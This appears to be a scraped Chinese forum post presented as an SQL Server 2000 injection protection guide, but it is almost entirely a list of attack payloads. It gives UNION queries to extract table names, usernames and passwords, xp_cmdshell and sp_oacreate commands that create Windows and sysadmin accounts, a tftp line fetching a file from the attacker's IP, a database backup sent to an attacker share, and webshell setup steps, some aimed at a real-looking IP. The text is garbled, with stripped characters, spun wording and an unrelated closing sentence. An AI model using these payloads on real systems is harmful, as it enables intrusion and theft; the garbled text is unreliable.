|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
支持大型的数据库。可以处理拥有上千万条记录的大型数据库。serverSQLServer2000注进防护年夜全(一)
Sql注进早源于or1=1
最主要的表名:
select*fromsysobjects
sysobjectsncsysobjects
sysindexestsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
最主要的一些用户名(默许sql数据库中存在着的)
public
dbo
guest(一样平常克制,大概没权限)
db_sercurityadmin
ab_dlladmin
一些默许扩大
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia驱动器相干
xp_dirtree目次
xp_enumdsnODBC毗连
xp_loginconfig服务器平安形式信息
xp_makecab创立紧缩卷
xp_ntsec_enumdomainsdomain信息
xp_terminate_process终端历程,给出一个PID
比方:
sp_addextendedprocxp_webserver,c: empxp_foo.dll
execxp_webserver
sp_dropextendedprocxp_webserver
bcp"select*FROMtest..foo"queryoutc:inetpubwwwrootuncommand.asp
-c-Slocalhost-Usa-Pfoobar
groupbyusers.idhaving1=1-
groupbyusers.id,users.username,users.password,users.privshaving1=1-
;insertintousersvalues(666,attacker,foobar,0xffff)-
unionselectTOP1COLUMN_NAMEFROMINFORMATION_SCHEMA.COLUMNSwhereTABLE_NAME=logintable-
unionselectTOP1COLUMN_NAMEFROMINFORMATION_SCHEMA.COLUMNSwhereTABLE_NAME=logintablewhereCOLUMN_NAMENOTIN(login_id)-
unionselectTOP1COLUMN_NAMEFROMINFORMATION_SCHEMA.COLUMNSwhereTABLE_NAME=logintablewhereCOLUMN_NAMENOTIN(login_id,login_name)-
unionselectTOP1login_nameFROMlogintable-
unionselectTOP1passwordFROMlogintablewherelogin_name=Rahul--
机关语句:查询是不是存在xp_cmdshell
unionselect@@version,1,1,1--
and1=(select@@VERSION)
andsa=(selectSystem_user)
unionselectret,1,1,1fromfoo--
unionselectmin(username),1,1,1fromuserswhereusername>a-
unionselectmin(username),1,1,1fromuserswhereusername>admin-
unionselectpassword,1,1,1fromuserswhereusername=admin--
anduser_name()=dbo
and0(selectuser_name()-
;DECLARE@shellINTEXECSP_OAcreatewscript.shell,@shellOUTPUTEXECSP_OAMETHOD@shell,run,null,C:WINNTsystem32cmd.exe/cnetuserswap5245886/add
and1=(selectcount(*)FROMmaster.dbo.sysobjectswhere
xtype=XANDname=xp_cmdshell)
;EXECmaster.dbo.sp_addextendedprocxp_cmdshell,xplog70.dll
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=x%20and%20name=xp_cmdshell)
and1=(selectIS_SRVROLEMEMBER(sysadmin))判别sa权限是不是
and0(selecttop1pathsfromnewtable)--暴库年夜法
and1=(selectnamefrommaster.dbo.sysdatabaseswheredbid=7)失掉库名(从1到5都是体系的id,6以上才能够判别)
创立一个假造目次E盘:
declare@ointexecsp_oacreatewscript.shell,@ooutexecsp_oamethod@o,run,NULL,cscript.exec:inetpubwwwrootmkwebdir.vbs-w"默许Web站点"-v"e","e:"
会见属性:(共同写进一个webshell)
declare@ointexecsp_oacreatewscript.shell,@ooutexecsp_oamethod@o,run,NULL,cscript.exec:inetpubwwwrootchaccess.vbs-aw3svc/1/ROOT/e+browse
and0(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=6)
顺次提交dbid=7,8,9....失掉更多的数据库名
and0(selecttop1namefrombbs.dbo.sysobjectswherextype=U)暴到一个表假定为admin
and0(selecttop1namefrombbs.dbo.sysobjectswherextype=Uandnamenotin(Admin))来失掉其他的表。
and0(selectcount(*)frombbs.dbo.sysobjectswherextype=Uandname=admin
anduid>(str(id)))暴到UID的数值假定为18779569uid=id
and0(selecttop1namefrombbs.dbo.syscolumnswhereid=18779569)失掉一个admin的一个字段,假定为user_id
and0(selecttop1namefrombbs.dbo.syscolumnswhereid=18779569andnamenotin
(id,...))来暴出其他的字段
and0<(selectuser_idfromBBS.dbo.adminwhereusername>1)
能够失掉用户名顺次能够失掉暗码。。。。。假定存在user_idusername,password等字段
Show.asp?id=-1unionselect1,2,3,4,5,6,7,8,9,10,11,12,13,*fromadmin
Show.asp?id=-1unionselect1,2,3,4,5,6,7,8,*,9,10,11,12,13fromadmin
(union语句各处风行啊,access也好用
暴库特别技能::%5c=大概把/和修正%5提交
and0(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=6)
and0(selecttop1namefrombbs.dbo.sysobjectswherextype=U)失掉表名
and0(selecttop1namefrombbs.dbo.sysobjectswherextype=Uandnamenotin(Address))
and0(selectcount(*)frombbs.dbo.sysobjectswherextype=Uandname=adminanduid>(str(id)))判别id值
and0(selecttop1namefromBBS.dbo.syscolumnswhereid=773577794)一切字段
_blank>http://xx.xx.xx.xx/111.asp?id=3400;createtable[dbo].[swap]([swappass][char](255));--
_blank>http://xx.xx.xx.xx/111.asp?id=3400and(selecttop1swappassfromswap)=1
;createTABLEnewtable(idintIDENTITY(1,1),pathsvarchar(500))Declare@testvarchar(20)execmaster..xp_regread@rootkey=HKEY_LOCAL_MACHINE,@key=SYSTEMCurrentControlSetServicesW3SVCParametersVirtualRoots,@value_name=/,values=@testOUTPUTinsertintopaths(path)values(@test)
_blank>http://61.131.96.39/PageShow.asp?TianName=政策律例&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--
失掉了web路径d:xxxx,接上去:
_blank>http://xx.xx.xx.xx/111.asp?id=3400;useku1;--
_blank>http://xx.xx.xx.xx/111.asp?id=3400;createtablecmd(strimage);--
传统的存在xp_cmdshell的测试历程:
;execmaster..xp_cmdshelldir
;execmaster.dbo.sp_addloginhax;--
;execmaster.dbo.sp_passwordnull,hax,hax;--
;execmaster.dbo.sp_addsrvrolememberhaxsysadmin;--
;execmaster.dbo.xp_cmdshellnetuserhax5258/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add;--
;execmaster.dbo.xp_cmdshellnetlocalgroupadministratorshax/add;--
execmaster..xp_servicecontrolstart,schedule
execmaster..xp_servicecontrolstart,server
http://www.xxx.com/list.asp?classid=1;DECLARE@shellINTEXECSP_OAcreatewscript.shell,@shellOUTPUTEXECSP_OAMETHOD@shell,run,null,C:WINNTsystem32cmd.exe/cnetuserswap5258/add
;DECLARE@shellINTEXECSP_OAcreatewscript.shell,@shellOUTPUTEXECSP_OAMETHOD@shell,run,null,C:WINNTsystem32cmd.exe/cnetlocalgroupadministratorsswap/add
_blank>http://localhost/show.asp?id=1;execmaster..xp_cmdshelltftp-iyouipgetfile.exe-
declare@asysnameset@a=xp_+cmdshellexec@adirc:
declare@asysnameset@a=xp+_cm+dshellexec@adirc:
;declare@a;set@a=db_name();backupdatabase@atodisk=你的IP你的共享目次bak.dat
假如被限定则能够。
select*fromopenrowset(sqloledb,server;sa;,selectOK!execmaster.dbo.sp_addloginhax)
从理论上讲,完全可以为数据表里的每个字段分别建一个索引,但MySQL把同一个数据表里的索引总数限制为16个。 |
|